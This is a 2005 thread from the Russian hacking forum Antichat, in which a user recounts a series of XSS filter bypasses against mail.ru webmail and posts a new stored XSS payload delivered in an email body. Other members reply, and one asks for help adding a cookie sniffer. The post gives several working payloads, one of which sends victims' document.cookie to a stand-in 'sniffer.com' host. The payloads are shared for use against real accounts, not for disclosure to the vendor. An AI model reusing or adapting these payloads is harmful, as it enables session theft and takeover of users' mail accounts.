Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.12.2005, 09:49
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Активная XSS на mail.ru
Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.
Антология XSS на mail.ru
Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка.
PHP код:
<image src=JaVaScRiPt:alert()>
Все были очень удивлены  Эта бага держалась очень долго...
Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось:
и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли...
Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так:
PHP код:
<img src="http://server.com/picture.jpg" dynsrc="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie">
К сожалению, всё что ушло в большой паблик долго не живет =)
И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так:
PHP код:
<bgsound src="&#106&#97&#118&#97&#115&#99&#114 ipt:alert()" loop=5>
Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом:
PHP код:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style
Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился.
PS. Не забываем о приватности раздела и доверии друг другу.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 04.12.2005 в 09:55..
|
|
|
04.12.2005, 10:26
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047
Репутация:
67
|
|
респект, проверим седня
|
|
|
|
04.12.2005, 10:34
|
|
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666
Репутация:
662
|
|
Молоток плюсик те 
__________________
|
|
|
|
04.12.2005, 11:20
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
__________________
Лучший способ защиты - это нападение!!!
|
|
|
|
04.12.2005, 11:49
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
ну вот=) в МОА только достойнейшие=)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
04.12.2005, 11:52
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
Если напомните, то будет хорошо)
По мойму дело рук Майора, или ЛиттлЛамера что-то не припомню...
А плюс щас поставим...
|
|
|
|
04.12.2005, 12:16
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277
Репутация:
1635
|
|
Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл.
Добавлено:
Точно про разметку забыл, гост спасибо
Последний раз редактировалось kot777; 04.12.2005 в 12:28..
|
|
|
|
04.12.2005, 12:24
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047
Репутация:
67
|
|
каким браузером тестил? хотя скорее всего ты разметку <html></html> не делал, да?
|
|
|
|
04.12.2005, 15:20
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 05.01.2006 в 06:24..
|
|
|
|
04.12.2005, 15:49
|
|
Seo Pozitive
Регистрация: 13.08.2004
Сообщений: 779
Провел на форуме:
5581277
Репутация:
1635
|
|
Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
admin mail.ru
|
ISRAEL |
Чужие Статьи |
42 |
10.08.2005 05:54 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
